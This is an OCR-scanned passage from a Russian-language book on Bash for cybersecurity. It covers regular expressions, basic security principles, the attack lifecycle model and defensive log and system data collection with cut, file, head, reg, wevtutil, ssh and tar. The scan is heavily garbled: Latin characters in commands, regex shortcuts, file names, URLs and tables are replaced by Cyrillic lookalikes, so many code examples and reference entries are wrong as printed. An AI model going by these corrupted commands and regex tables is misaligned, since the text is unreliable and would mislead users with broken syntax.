Например, шаблон [1—475] не соответствует числам от 1 до 475; он соответствует 
любой из цифр (символов) в диапазоне 1—4, или символу 7, или символу 5. 


Кроме того, есть предопределенные символьные классы, известные как сокращения 
для наборов символов. Их можно использовать для обозначения общих классов 
символов, таких как цифры или буквы (табл. 3.2). 


Таблица 3.2. Сокращения регулярных выражений 


Символ Значение 

\5 Пробельный символ 

\5 Непробельный символ 

\а Цифровой символ 

39) Нецифровой символ 

\\ Слово 

\\ Не слово 

\х Шестнадцатеричное число (например, 0х5Е) 


Обратите внимание, что эти сокращения не поддерживаются командой ергер. 
Чтобы их применить, вы должны воспользоваться командой вгер с параме- 
тром -Р, который позволяет механизму регулярных выражений Рег| поддерживать 
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сокращения. Например, чтобы найти любые числа в файле #го$* . Ех, вы напишете 
следующее: 


$ егер -Р '\а' Рго$*. 4х 


1 Тимо гоааѕ діуегреа іп а уе11ом моод, 
2 Апа зоггу І сои1а пої +гауе1 Бон 

ЕЈ Апа Бе опе Ёғауе1ег, Іопе І $Фооа 

4 Апа Іоокеа аомп опе аз Фаг аѕ І сои1а 
5 То мпеге 1% беп іп һе ипаегргомћ; 
6 
7 


ЕхсегрЕ гот Тһе Коаа № Такеп Бу ВобегЕ Егоѕ+ 


Другие символьные классы (с более подробным синтаксисом) действительны 
только внутри скобок, как показано в табл. 3.3. Они соответствуют одному симво- 
лу, поэтому, если вам нужно сопоставить несколько строк подряд, чтобы получить 
необходимое повторение, используйте символы * или +. 


Таблица 3.3. Символьные классы регулярных выражений в скобках 


Символьный класс | Значение 

:аіпит:] Любой буквенно-цифровой символ 
[:аІрћа:] Любой алфавитный символ 
[:спе1:] Любой управляющий символ 

| Ве Любая цифра 

:егарћ:] Любой графический символ 
[Ломег:] Любой символ нижнего регистра 
[:ргіпе:] Любой печатаемый символ 
[:рипсё] Любой знак препинания 

[:ѕрасе:] Любой пробельный символ 
[:иррег:] Любой символ верхнего регистра 
[:хаіеі:] Любая шестнадцатеричная цифра 


Чтобы можно было использовать один из этих классов, он должен быть внутри ско- 
бок. Таким образом, вы получите два набора скобок. Например, вгер '[[: спёг1: 1]' 
1агве.да+а будет искать строки, содержащие управляющие символы (АЅСП 0-25). 
Вот еще один пример: 


вгер 'Х[[:иррег: ][:91ісі+:1]' 191151.1хі 


Согласно этой команде будет выполнен поиск содержимого в файле 1а1151.+хі 
и в результате будет выведена любая строка, содержащая символ Х, за которым 
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следует любая прописная буква или цифра. У нас при выполнении данной команды 
отображаются следующие строки: 


Оѕег: ХТјоһпѕоп 
ап ХМіпе тоае1 7 
ап Х7міпе тоде1 


В каждой из этих строк есть прописная буква Х, за которой сразу следует либо 
другая прописная буква, либо цифра. 


Обратные ссылки 


Обратные ссылки на регулярные выражения являются одной из самых мощных 
и часто сбивающей с толку операцией регулярных выражений. 


Рассмотрим! следующий файл +авѕ.+х+: 


Соттапа 
<1>11пе</1> 

15 
<аіу>ргеаї</аіу> 
<и>!</и> 


лргоъьв 


Предположим, вы хотите написать регулярное выражение, которое будет извлекать 
любую строку, содержащую соответствующую пару полных тегов НТМІ.. От- 
крывающий тег включает имя тега НТМІ; закрывающий тег имеет то же имя, но 
с символом слеша. Рассмотрим теги <91\> и </4іу>. Вы можете найти их, написав 
длинное регулярное выражение, содержащее все возможные значения тегов НТМГ, 
или же сосредоточиться на формате тега НТМТ. и использовать обратную ссылку 
на регулярное выражение, как показано ниже: 


$ евгер '<([А-7а-2]*)>.*</\1>' +арѕ.іхі 


2 <1>11пе</1> 
4 <аіу>ргеаї</аіу> 
5 <и>!</и> 


В этом примере обратная ссылка \1 расположена в последней части регулярного 
выражения. Эта ссылка направляет нас к выражению, заключенному в первый на- 
бор скобок, [А-2а-2]*. Данное выражение состоит из двух частей. Диапазон букв 


' Для эксперимента создайте этот файл и сохраните его в папке, в которой ранее был со- 


хранен файл #`0$(.6х%, то есть в папке С:/Воше (для Міпаомѕ) или в каталоге /ћоте (для 
Тапах). 
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в скобках обозначает, что может быть выбрана любая буква, прописная или строч- 
ная. Знак *, который следует за буквенным выражением в квадратных скобках, 
означает повторение действия ноль и некоторое количество раз. Следовательно, 
\1 ссылается на соответствующий шаблон, который задан в скобках. Если [А-2а-2]* 
соответствует дім, то \1 также ссылается на шаблон аїу. 


Таким образом, общее регулярное выражение можно описать так. Сначала должен 
быть указан знак «меньше» (<). Это первый символ в регулярном выражении. 
За ним следует некоторое количество букв (от нуля и более). Далее находится 
символ «больше» (>). После символа > может располагаться некоторое количество 
символов (от нуля и более). Точка (.) означает любой символ, кроме конца строки, 
а звездочка (*) — ноль или большее количество совпадений с предыдущим элемен- 
том, сопровождаемым еще одним символом < и слешем (/). Далее располагается 
последовательность, соответствующая выражению в круглых скобках, которая 
завершается символом >. Если данная последовательность соответствует любой 
части строки нашего текстового файла, евгер выведет эту строку. 


Вы можете использовать несколько обратных ссылок в выражении и обращаться 
к каждой как \1, или \2, или \3, в зависимости от ее порядка в регулярном вы- 
ражении. Символ \1 относится к первому набору скобок, \2 — ко второму и т. д. 
Обратите внимание, что круглые скобки являются метасимволами; у них есть 
особое значение. Если вы просто хотите найти соответствие круглой скобке, вам 
нужно исключить ее специальное значение, поставив перед ней обратный слеш. 
Например, напишите $1п\ ([9-9.]*\), чтобы найти такие выражения, как ѕіп(6.2) 
или 51п(3.14159). 


Валидный НТМІ-код не обязательно должен быть расположен в одной строке; 
закрывающий тег может находиться в нескольких строках от открывающего. Кро- 
ме того, встречаются одиночные теги, например <Ьг/> для разрыва строки или 
<р/> для пустого абзаца. Для того чтобы включить такие условия в наш поиск, 
придется использовать более сложный подход. 


Квантификаторы 


Квантификаторы указывают, сколько раз элемент должен появиться в строке, 
и определяются фигурными скобками {}. Например, шаблон Т{5} означает, что 
буква Т должна последовательно появляться ровно пять раз. Шаблон Т{3,6} 
означает, что буква Т должна появляться последовательно от трех до шести раз. 
Шаблон Т{5, } означает, что буква Т должна появляться пять раз или более. 
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Якоря и границы слов 


Если нужно указать, что шаблон должен находиться в начале или в конце строки, 
можно использовать якоря. Символ каретки (^) предназначен для привязки ша- 
блона к началу строки. Например, ^[1-5] означает, что соответствующая строка 
должна начинаться с одной из цифр от 1 до 5. Символ $ используется для привязки 
шаблона к концу последовательности или строки. Например, [1-5]% означает, что 
строка должна заканчиваться одной из цифр от 1 до 5. 


Кроме того, вы можете использовать \Ь для определения границы слова (то есть обо- 
значить пробел). Шаблон \Ь[1-5]\6 будет соответствовать любой из цифр от 1 до 5, 
где цифра представлена словом. 


Выводы 


Регулярные выражения чрезвычайно эффективны для описания шаблонов и могут 
использоваться в сочетании с другими инструментами для поиска и обработки 
данных. 


Использование регулярных выражений и их полный синтаксис выходят далеко 
за рамки этой книги. Для получения дополнительной информации о регулярных 
выражениях можете посетить следующие ресурсы: 

О һр: //улуу.гехедд.соту/; 

О 1ћрѕ://гедех101.сот; 

О һр: //млллм.гедежесзег.сот/; 


О И&р://мммм.гед\аг-ехрге$юп5.1пТ0/. 


В следующей главе мы рассмотрим некоторые принципы кибербезопасности высо- 
кого уровня, чтобы вы получили общее понимание операций, связанных с атаками 
на другие компьютерные системы и защитой собственных данных. 


Упражнения 


1. Напишите регулярное выражение, соответствующее десятичному числу, на- 
пример 3.14. С обеих сторон от десятичной точки могут быть цифры, но не обя- 
зательно, чтобы они были слева или справа. В регулярном выражении должна 
совпадать только десятичная точка. 
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2. Используйте обратную ссылку в регулярном выражении, чтобы числа, находя- 
щиеся по обе стороны от знака равенства, соответствовали друг другу. Например, 
«314 15 = ї0 314» — это правильно, а <6 = 7» — это неправильно. 


3. Напишите регулярное выражение, с помощью которого будет выполняться 
поиск строки, начинающейся с цифры и заканчивающейся цифрой, при этом 
между этими цифрами может быть все что угодно. 


4. Напишите регулярное выражение, которое использует группирование для со- 
поставления по следующим двум ІР-адресам: 10.0.0.25 и 10.0.0.134. 


5. Напишите регулярное выражение, которое будет соответствовать условию, при 
котором шестнадцатеричная строка 0х90 встречается более трех раз подряд 
(то есть 0х90 0х90 0х90). 


Чтобы просмотреть дополнительные ресурсы и получить ответы на эти вопросы, 
зайдите на сайт Һрѕ://мму.гарійсубегорѕ.соту/. 


Принципы защиты 
и нападения 


В этой книге мы будем обсуждать командную строку и Баѕћ в контексте кибер- 
безопасности. Но перед тем, как рассматривать методы обеспечения безопасности, 
кратко обсудим основополагающие концепции. 


Кибербезопасность 


Кибербезопасность — это реализация мер по защите информации и систем, храня- 
щих или обрабатывающих информацию. Кибербезопасность определяется такими 
принципами, как: 

конфиденциальность; 

целостность; 

доступность; 


строгое выполнение обязательств; 


оооеоо 


аутентификация. 


Конфиденциальность 


Информация называется конфиденциальной, если она может быть доступна только 
авторизованным пользователям. Авторизованными называются пользователи, 
создающие информацию, и предполагаемые получатели информации. Нарушение 
конфиденциальности часто является целью многих кибератак. Чтобы нарушить 
конфиденциальность, злоумышленники могут перехватить информацию во 
время ее передачи (например, через небезопасное №і-Еі-соединение). Или же 
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могут обойти контроль безопасности в системе, чтобы украсть хранящуюся там 
информацию. 


Информация, которой хотят завладеть злоумышленники, включает в себя личные 
сообщения (электронная почта, текстовые сообщения), фотографии, сведения, 
составляющие коммерческую тайну, платежные данные (номера кредитных/ 
дебетовых карт), личные идентификаторы (номера социального страхования), 
конфиденциальную государственную и военную информацию. 


Шифрование и контроль доступа — это стандартные механизмы, используемые 
для защиты конфиденциальности. 


Целостность 


Информация сохраняет свою целостность, если она может быть изменена только 
авторизованными пользователями. Необходимо, чтобы целостность информации 
легко проверялась, то есть требуется, чтобы мы могли легко определить, была ли 
информация изменена неавторизованной третьей стороной. 


Целостность может быть нарушена, когда информация находится в пути (переда- 
ется от устройства к устройству) или когда система находится в состоянии покоя. 
Такое нарушение информации может быть как случайным, так и преднамеренным. 
Случайное нарушение целостности может произойти из-за неправильного ввода 
данных, отказа оборудования и воздействия солнечного излучения. К преднаме- 
ренным действиям можно отнести несанкционированное изменение файла, базы 
данных или сетевого пакета. 


Для подтверждения целостности информации часто используется криптографи- 
ческое хеширование. 


Доступность 


Информация считается доступной, если к ней при необходимости можно получить 
доступ в любом месте и в любое время. Доступ к информации также должен быть 
своевременным и удобным для пользователя. 


Атаки в отношении доступности становятся все более популярными среди хакеров, 
поскольку дают быстрый и видимый эффект. Случайные инциденты по нарушению 
доступности могут случиться из-за отключения питания, аппаратного сбоя или 
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сбоя в программном обеспечении. К преднамеренным действиям относятся рас- 
пределенные атаки типа «отказ в обслуживании» (0. 00$-атака) и атаки в целях 
вымогательства. 


Обычно для поддержания доступности используется резервное копирование дан- 
ных и резервирование электропитания, а также переключение при сбое (например, 
переход от одной системы к другой). 


Строгое выполнение обязательств 


Строгое выполнение обязательств связывает объект (пользователя, программу 
ит. д.) с действиями, предпринимаемыми этим объектом. Например, подпись лица 
на юридическом договоре может быть использована для доказательства того, что 
лицо согласилось с условиями договора. Лицу, подписавшему договор, трудно 
впоследствии отказываться от него, поскольку доказательством согласия с этим 
договором выступает подпись. 


Общие методы обеспечения строгого выполнения договора включают проверку 
подлинности пользователя, цифровые подписи и ведение системного журнала. 


Аутентификация 


Аутентификация — это успешная идентификация и проверка личности поль- 
зователя. Аутентификация — важнейший компонент, обеспечивающий доступ 
к информации или возможность изменения информации только авторизованным 
пользователем. Механизм аутентификации является одним из наиболее значимых 
компонентов информационных систем, поскольку успех других четырех принципов 
часто зависит от аутентификации. 


К общим средствам, используемым для аутентификации, относятся имена пользо- 
вателей и пароли, карты электронных ключей и биометрические данные. 


Жизненный цикл атаки 


Опытные злоумышленники, такие как киберпреступники и элитные хакеры, 
не работают случайным образом. Они следуют общей и эффективной страте- 
гии выполнения атак. Стратегия «М-тенденции 2010: передовая постоянная 
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угроза» (ћіёр://ЫіЄІу/2Сп5ВЈН) была разработана знаменитой американской фирмой 
Мап1апе$ и известна как жизненный цикл атаки (Аќаск Іле Сусе). В дальнейшем 
эта модель была усовершенствована и на данный момент включает в себя восемь 
пунктов. 

Разведка (Кесоппаіѕѕапсе). 

Начальная эксплуатация (Та ЕхроКа@оп). 

Установка точки опоры (ЕзбаБИзЬ Еооёћо!а). 

Повышение привилегий (Езса|абе РгіуПервеѕ). 

Внутренняя разведка (Гкегпа| Кесоппаіѕѕапсе). 

Боковое смещение (Табега! Моуетепі). 


Сохранение присутствия (Маіпѓаіп Ртезепсе). 


омо илр о һр 


Завершение миссии (Сотріеќе Міѕѕіоп). 


На протяжении всей книги мы будем разрабатывать инструменты, которые имеют 
отношение ко многим этапам этой модели. 


Разведка 


На этапе разведки злоумышленник определяет адресное пространство и схему 
целевой сети, используемые технологии, связанные с ними уязвимости, а также 
получает информацию о пользователях и иерархии целевой организации. 


Разведывательную деятельность можно разделить на два вида: пассивную и ак- 
тивную. При пассивной разведке в окружающую целевую среду не вводятся 
никакие данные и не изменяется состояние системы. Как правило, она не обна- 
руживается целью. К примерам пассивных действий относятся поиск пакетов 
в проводной или беспроводной сети, поиск в Интернете и запросы системы до- 
менных имен (05). 


При активной разведке вводятся данные и/или изменяется состояние целевой 
системы. Она может быть потенциально обнаружена в целевой системе. Примеры 
активной разведки: сканирование портов, сканирование уязвимостей и просмотр 
веб-сайтов. 


В конце этапа разведки злоумышленник получит подробное описание целевой сети, 
некоторые сведения о пользователях сети, сведения о потенциальных уязвимостях 
и во многих случаях о действительных учетных данных для сети. 
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Начальная эксплуатация 


Фаза начальной эксплуатации начинается, когда злоумышленник предпринимает 
свое первое действие, чтобы получить доступ к системе. При этом обычно исполь- 
зуется найденная уязвимость в системе. К методам первоначальной эксплуатации 
относятся использование переполненного буфера, ЗОТ.-инъекции, межсайтовый 
скриптинг (Х$5), метод «грубой силы» (перебор) и фишинг. 


В конце фазы начальной эксплуатации злоумышленник получит некоторый уро- 
вень доступа к системе, например возможность читать или записывать данные или 
выполнять произвольный код. 


Установка точки опоры 


После того как злоумышленник получит первоначальный доступ к системе, он 
должен убедиться, что у него есть возможность оставаться в системе в течение дли- 
тельного времени и по мере необходимости восстанавливать доступ. В частности, 
злоумышленник не хочет обращаться к системе каждый раз, когда ему необходим 
доступ, поскольку это увеличивает операционный риск. К методам, используемым 
для установки точки опоры, относятся создание новых пользователей системы; 
использование возможностей удаленного доступа, таких как Ѕесиге ЗВей ($5Н), 
Тепе или протокол удаленного рабочего стола (КОР); установка вредоносных 
программ, таких как «троянский конь» (КАТ). 


Успешное выполнение фазы «Установка точки опоры» позволяет злоумышлен- 
нику постоянно сохранять присутствие в системе и по мере необходимости вос- 
станавливать доступ. 


Точка опоры считается постоянной, если она способна выдержать обычные 
действия по обслуживанию системы, такие как перезагрузка и установка ис- 
правлений. 


Повышение привилегий 


Когда злоумышленник получает первоначальный доступ к системе, он может 
сделать это только на непривилегированном уровне. Как непривилегированный 
пользователь, злоумышленник не имеет возможности сбрасывать пароли, уста- 
навливать программное обеспечение, просматривать файлы других пользователей 
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или изменять нужные настройки. Чтобы решить эту проблему, злоумышленнику 
необходимо повысить привилегии до учетной записи гооё или администратора. 
К методам достижения этой цели относятся использование уязвимостей, связан- 
ных с переполнением буфера локальной системы, кража учетных данных и про- 
цесс инъекции. 


В конце этапа повышения привилегий злоумышленник получает доступ к при- 
вилегированной учетной записи гоої или аккаунту администратора в локальной 
системе. Если злоумышленнику особенно повезет, он также получит доступ к при- 
вилегированной учетной записи домена, которая может использоваться в разных 
системах сети. 


Внутренняя разведка 


Теперь, когда злоумышленник установил точку опоры и получил привилегиро- 
ванный доступ к системе, он может начать опрашивать сеть из своей новой точки 
расположения. Методы, используемые на этом этапе, не сильно отличаются от 
методов предыдущего этапа разведки. Основное отличие заключается в том, что 
теперь злоумышленник имеет опорную точку внутри целевой сети и сможет пере- 
числить значительно больше хостов. Кроме того, теперь будут видны внутренние 
сетевые протоколы, связанные, например, с Асйуе Оттестоту. 


В конце фазы внутренней разведки у злоумышленника будет более подробная 
карта целевой сети, хостов и пользователей, которую можно использовать для 
уточнения общей стратегии и определения действий на следующей фазе жизнен- 
ного цикла. 


Боковое смещение 


Из-за особенностей компьютерных сетей маловероятно, что злоумышленник сразу, 
на этапе первоначального подключения, получит доступ к той системе, которая 
необходима ему для выполнения задуманной задачи. Поэтому злоумышленнику 
придется перемещаться в боковом направлении по сети, чтобы найти и получить 
доступ к требуемой системе. 


Методы, используемые на этапе бокового смещения, включают в себя кражу учет- 
ных данных, передачу хеша и прямое использование выявленных уязвимостей на 
удаленных хостах. В конце этого этапа злоумышленник получит доступ к хосту 
или хостам, требуемым для выполнения необходимой задачи, и, вероятно, доступ 
к нескольким другим хостам, расположенным между ними. Многие злоумыш- 
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ленники по мере их бокового смещения по сети оставляют постоянные бэкдоры 
(«черные ходы») в системах, которые впоследствии помогут восстановить доступ 
и затруднить полное удаление опорных точек из сети, если будет обнаружена их 
активность. 


Сохранение присутствия 


Злоумышленники, как правило, не поддерживают постоянное сетевое подклю- 
чение к вредоносным программам, внедренным в целевую систему и распростра- 
няющим действие по всей целевой сети, поскольку это увеличивает вероятность 
обнаружения этих вредоносных программ. В качестве альтернативы злоумышлен- 
ники могут периодически вызывать внедренные вредоносные программы на свой 
командно-административный (С&С) сервер, чтобы эти программы могли получать 
автоматические инструкции или прямые указания от человека. Это действие, про- 
исходящее на этапе «Сохранение присутствия», известное как установка маяка 
(Беасопіпе), является частью общего обслуживания, которое злоумышленник 
должен выполнить, чтобы сохранить свое присутствие в сети. 


Завершение миссии 


Последняя фаза жизненного цикла атаки, или завершение миссии, позволяет зло- 
умышленнику выполнить свою работу. Эта фаза часто принимает форму сбора 
и отсылки информации отслеживания из целевой сети. Чтобы избежать обнару- 
жения, злоумышленники пытаются маскировать эксфильтрацию (постепенное 
просачивание) под обычный трафик, используя для этого стандартные порты 
и протоколы, такие как НТТР, НТТР$ и ОМ$. 


Несмотря на то что не все вторжения завершаются эксфильтрацией данных, этот 
этап также часто называют заключительной фазой. 


Выводы 


Компьютерная безопасность — это комплекс мер по защите информации и систем, 
хранящих или обрабатывающих информацию. Информация должна быть доступ- 
ной для чтения и изменяться только уполномоченными сторонами. Она должна 
быть доступна там, где она необходима. Кроме того, требуется гарантия, что доступ 
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к системе смогут получить только авторизованные объекты, а все их действия 
должны регистрироваться. 


Атака всегда проходит согласно определенному плану, обычно называемому жиз- 
ненным циклом атаки. Атака начинается с выбора цели и проведения разведки 
и заканчивается удалением данных или разрушением системы. 


Дополнительные сведения о методах атак, связанных с этой и аналогичными 
моделями эксплуатации, можно получить в системе МІТВЕ: Адуегѕагіа! Тасіісѕ, 
Тесһпідиеѕ & Соттоп Кпо\медде (АТТ&СК) (ПЕ рз://аКаск.плИге.огд/). 


Во второй части мы рассмотрим, как можно использовать командную строку для 
выполнения операций кибербезопасности с помощью сбора, обработки и анализа 
данных. 


Часть П 


Защитные операции 
с использованием Ббаѕћ 


Готовьтесь к неизвестному, изучая, 
как другие в прошлом справлялись 
с непредвиденным и непредсказуемым. 


Джордж С. Паттон (Сеотве 5. Райоп) 


В части П мы подробно рассмотрим, как использовать команд- 
ную строку с целью сбора, обработки, анализа и отображения 
данных для защитных операций кибербезопасности. 


Сбор информации 


Данные — это основа почти каждой операции по обеспечению безопасности. 
Данные сообщают вам текущее состояние системы, говорят о том, что произошло 
ранее, и даже о том, что еще может произойти. Они необходимы для проведения 
криминалистической экспертизы, проверки соответствия и обнаружения вредо- 
носных действий. В табл. 5.1 приводится описание данных, которые обычно от- 
носятся к защитным операциям, и их обычное месторасположение. 


Таблица 5.1. Данные, которые нас интересуют 


Данные Описание данных Расположение данных 
Файлы Подробности обо всех В Ппих большинство лог-файлов 
журналов происходящих в системе находится в каталоге /уаг/105. 
процессах и о самом состоянии В М п4о\$ системные журналы 
системы. Интересные лог-файлы | находятся в журнале событий 
включают журналы веб-сервера (Еуепе Гое) 
и О№5-сервера, журналы 
маршрутизатора, брандмауэра, 
системы обнаружения вторжений 
и журналы приложений 
История Список недавно выполненных В Ппах расположение файла истории 
команд команд можно найти, выполнив команду 
есһо $НІЅТЕПЕ. Этот файл обычно 
расположен в домашнем каталоге 
пользователя в .Баѕћ һіѕогу 
Временные Различные пользовательские В \п4о\з временные файлы можно 
файлы и системные файлы, к которым найти по адресу с\міпаоуѕ\етр 
был недавно получен доступ, и % ОЗЕВКРВОЕЦ.Е%\Арр)аа\ 
которые были сохранены или Госа№. В пих временные файлы 
обработаны обычно размещаются в каталоге /ітр 
и /уаг/єтр. Временный каталог Шпих 
можно также найти с помощью команды 
есһо $ТМРОТВ, 
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Данные Описание данных Расположение данных 


Данные Документы, изображения и другие | Пользовательские файлы в пах 
пользователя | файлы, созданные пользователем | обычно размещаются в каталоге /ћоте/. 
В \Уіпіомѕ эти файлы вы найдете 

в папке с\Оѕегѕ\ 


История Веб-страницы, которые недавно Широко варьируется в зависимости 
браузера были открыты от операционной системы и браузера 
Реестр Иерархическая база данных, Реестр Міпаоуѕ 

Міпаоуѕ в которой хранятся настройки 


и другие данные, важные для 
работы Міпаоуѕ и приложений 


В этой главе мы рассмотрим различные методы сбора данных как из локальной 
операционной системы, так и из удаленной (из Глпих и Ұіпаоҳѕ). 


Используемые команды 


В этом разделе мы познакомим вас с командами, которые помогут выбрать и со- 
брать интересующие вас данные из локальных и удаленных систем. Для операци- 
онной системы Шпих это такие команды, как си*, Ғі1е, һеаа, а для систем №іпаоүѕ 
это команды геұ& и меуёи+11. 


СИ 


Команда сиё используется для извлечения отдельных частей файла. Во время ее 
выполнения происходит построчное чтение предоставленного входного файла 
и анализ каждой прочитанной строки с помощью указанного разделителя. Если раз- 
делитель не указан, команда си* в качестве разделителя по умолчанию будет ис- 
пользовать символ табуляции. Разделители делят каждую прочитанную строку 
файла на поля. Для извлечения частей файла можно использовать либо номер поля, 
либо номер позиции символа. Поля и символы начинаются с позиции 1. 


Общие параметры команды 


О -с — символы для извлечения. 


О -а — символ, используемый в качестве разделителя полей. По умолчанию раз- 
делителем является символ табуляции. 


О -+ — поля для извлечения. 
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Пример команды 


Для демонстрации действия команды си воспользуемся текстовым файлом 
си +11е.+х+. Он состоит из двух строк, каждая с тремя столбцами данных, как по- 
казано в примере 5.1. 


Пример 5.1. сие 


12/05/2017 192.168.10.14 фезф.И{т1 
12/30/2017 192.168.10.185 1Іоріп.һітІ 


В файле ситғі1е. хі каждое поле разделено пробелом. Для извлечения ІР-адреса 
(второе поле) используйте следующую команду: 


$ си -а' ' -+2 сие. хе 


192.168.10.14 
192.168.10.185 


Параметр -4'' указывает, что в качестве разделителя полей используется пробел. 
Параметр -+2 определяет, что команде нужно вырезать и отобразить второе поле, 
в данном случае ІР-адреса. 


Команда сиё рассматривает каждый символ-разделитель как символ, отделяющий 
поле. Он не изменяет количество пробелов. Рассмотрим следующий пример: 


Раї 25 
Рефе 12 


Если мы в отношении этого файла выполним команду сиї, то в качестве разде- 
лителя зададим пробел. В первой записи есть три пробела между именем (Раї) 
и номером (25). Таким образом, число находится в поле 4. Однако для следующей 
строки имя (Реѓе) находится в поле 3, так как между именем и номером стоит 
только два пробела. Для такого файла данных было бы лучше отделить имя от 
числа одним символом табуляции и использовать его в качестве разделителя 
для команды си. 


Не 


Команда #і1е используется для идентификации типа файла. Это особенно полезно 
в операционной системе Глпих, так как большинство файлов не имеют расширения, 
которое можно использовать для идентификации типов (в отличие от \/ 140%, 
где расширения файлов есть, например .ехе). Команда #і1е смотрит не только на 
имя файла, читая и анализируя первый блок данных, также известный как маги- 
ческое число (тавіс патрег). Даже если вы переименуете файл-изображение А.рпе 
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и присвоите ему имя и расширение С.3р$, изменив тем самым его тип, команда 
+11е сможет понять это и сообщит вам правильный тип файла (в данном случае 


это РМС-файл). 
Общие параметры команды 


О -+-— читать список файлов для анализа из данного файла. 


О -к — не останавливаться на первом совпадении, перечислять все совпадения 
для типа файла. 


О -2 — просмотреть сжатые файлы. 
Пример команды 


Чтобы определить тип файла, передайте его имя команде +11е: 
$ +11е ипкпомпҒі1е 


ипкпомп+і1е: Місгоѕо#ё Мога 2007+ 


һеаа 


Команда һеаа позволяет отобразить несколько первых строк или байтов файла. 
По умолчанию выводит первые десять строк. 


Общие параметры команды 


О -п — количество строк для вывода. Чтобы отобразить 15 строк, можно задать 
-015 ИЛИ -15. 


О -с — количество байтов для вывода. 


гед 


Команда гер используется для управления реестром \/т4о\з и доступна в №ір- 
4о\/$ ХР и более поздних версиях. 


Общие параметры команды 


О ада — добавить записи в реестр. 


О ехрог* — копировать указанные записи реестра в файл. 


О ачегу — возвратить список подразделов ниже указанного пути. 
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Пример команды 


Чтобы перечислить все корневые ключи в ветке НКЕУ_1ОСАЕ_МАСНТМЕ, введите в Се 
Ваѕһ команду: 


$ геё аиегу НКЕУ_ГОСАЕ_МАСНТМЕ 


НКЕУ_ЁОСАЕ_МАСНТМЕ\ВСО00000000 
НКЕУ_ГОСАЕ_МАСНТМЕ\НАВОМАКЕ 
НКЕУ_ГОСАЁ_МАСНТМЕ\$ АМ 
НКЕУ_ГОСАЕ_МАСНТМЕ\ЕСУВТТУ 
НКЕУ_ЁОСАЕ_МАСНТМЕ\ОРТМАКВЕ 
НКЕУ_ГОСАЕ_МАСНТМЕ\ У$ТЕМ 


мемий| 


ме\уфи{11 — это утилита командной строки, используемая для просмотра систем- 
ных журналов в среде \п4о\уз и управления ими. Она доступна в большинстве 
современных версий \/т4о\$ и вызывается из Сі Ваз|. 


Общие параметры команды 


О е1 — перечислить доступные журналы. 


О ае — запросить события журнала. 
Общие опции команды 


О /с — максимальное количество событий для чтения. 


О /+— форматировать вывод в виде текста или ХМГ. 


О /га — если установлено значение {гие, то сначала прочитать самые последние 
журналы. 


В командной строке М/іпаоуѕ перед параметрами команды требуется только один 
символ /. В терминале СЁ Ваѕћ из-за способа обработки команд необходимы два 
символа // (например, //с). 


Пример команды 


Чтобы перечислить все доступные журналы, введите команду: 


меуёи+і1 е1 
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Чтобы просмотреть последнее событие в системном журнале через СЁ Ваѕћ, вве- 
дите команду: 


ме\уи{11 ае 5узфет //с:1 //га: +гие 


Дополнительные сведения о команде мемий см. в документации Мсгозой по 
адресу НИр://Б.у/2ЕТВЗар. 


Сбор информации о системе 


При защите системы в первую очередь нужно понять ее состояние и выполняемые 
ею действия. Поэтому для анализа состояния системы вам необходимо собрать 
данные, как локальные, так и удаленные. 


Удаленное выполнение команды 
с использованием 55Н 


Данные, которые вы хотите получить, не всегда могут быть доступны локаль- 
но. Возможно, чтобы получить нужные данные, вам потребуется подключиться 
к удаленной системе по сети с помощью протокола передачи файлов (ЕПе Тгапѕѓег 
Ргобосо[, ЕТР) или $$Н-сервера. 


Команды могут выполняться с использованием 5$Н удаленно и безопасно, но при 
условии, если в удаленной системе также запущена служба 55Н. В базовом виде 
(без параметров), чтобы запустить ее на необходимом хосте, вы можете просто 
добавить перед любой командой, выполняемой в оболочке, команду $51 и имя тре- 
буемого хоста. Например, ѕ55ћ тузегуег мћо. Эта команда запустит мпо на удаленном 
компьютере туѕегуег. Если вам нужно указать другое имя пользователя, введите 
ѕ5һ изегпаме @ тузегуег мпо или $51 -1 иѕегпате музегуег. Эти команды выполня- 
ют одно и то же действие. Только замените иѕегпате именем пользователя, под 
которым хотите войти в систему. Вы можете перенаправить вывод в файл в вашей 
локальной системе или в файл в удаленной системе. 


Для выполнения команды в удаленной системе и перенаправления вывода в файл 
в локальной системе введите следующее: 


55һ тузегуег рѕ > /©тр/рѕ.оиї 
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Для выполнения команды в удаленной системе и перенаправления вывода в файл 
в удаленной системе введите следующее: 


55һ тузегуег рѕ \> /&тр/р$.оч 


Если вы добавите обратный слеш, это избавит вас от специального значения пере- 
направления (в текущей оболочке) и просто передаст символ перенаправления как 
второе слово из трех слов, отправленных на туѕегуег. При выполнении в удаленной 
системе команда будет интерпретироваться этой оболочкой, перенаправлять вывод 
на удаленный компьютер (тузегуег) и оставлять его там. 


Кроме того, используя $$Н, вы можете брать скрипты, которые находятся в вашей 
локальной системе, и запускать их в удаленной системе. Для этого следует исполь- 
зовать команду для удаленного запуска сценария оѕӣе+есі. $1: 


55һ тузегуег Базй < ./озаефес+.$И 


Она запускает в удаленной системе команду БазН и передает в запущенную обо- 
лочку строки скрипта озаефес* . ѕћ непосредственно из вашей локальной системы. 
Это избавляет от необходимости двухэтапного процесса: сначала передать скрипт 
в удаленную систему, а затем запустить его. Результат выполнения скрипта возвра- 
щается в вашу локальную систему и может быть захвачен путем перенаправления 
$ Чоць, как мы это делали со многими другими командами. 


Собираем файлы журнала Шпих 


Файлы журналов для системы Глпих обычно хранятся в каталоге /маг/1о8/. Чтобы 
легко собрать файлы журнала в один файл, используйте команду «аг: 


{аг -с2# ${НОЗТМАМЕ} 108$.+аг.27 /маг/10р/ 


Параметр -с используется для создания архивного файла, -2 — для архивирования 
файла и -+ — для указания имени файла вывода. Переменная НОЅТМАМЕ — это пере- 
менная Баѕћ, которая автоматически устанавливается оболочкой на имя текущего 
хоста. Мы включаем его в наше имя файла, поэтому файл вывода будет иметь то же 
имя, что и система, что поможет позже с организацией, если журналы собираются 
из нескольких систем. Обратите внимание, что для успешного копирования файлов 
журнала вам нужно будет войти в систему в качестве привилегированного пользо- 
вателя или ввести команду ѕидо. 


В табл. 5.2 перечислены некоторые важные и распространенные журналы Глпих 
и их стандартные расположения. 


Глава 5. Сбор информации 73 


Таблица 5.2. Файлы журналов Шпих 


Расположение журнала | Описание 


/чаг Лов/арасһе2/ Журналы доступа и ошибок для веб-сервера Арасће 

/чат Лов/ашћ Іов Сведения о входе пользователя в систему, привилегированном 
доступе и удаленной проверке подлинности 

/чаг Лов/Кегп Іов Журналы ядра 

/чаг Лов/теѕѕавеѕ Общая некритическая системная информация 


/чаг Лов /ѕуѕіов Общие системные журналы 


Чтобы получить больше информации о том, где хранятся файлы журналов для 
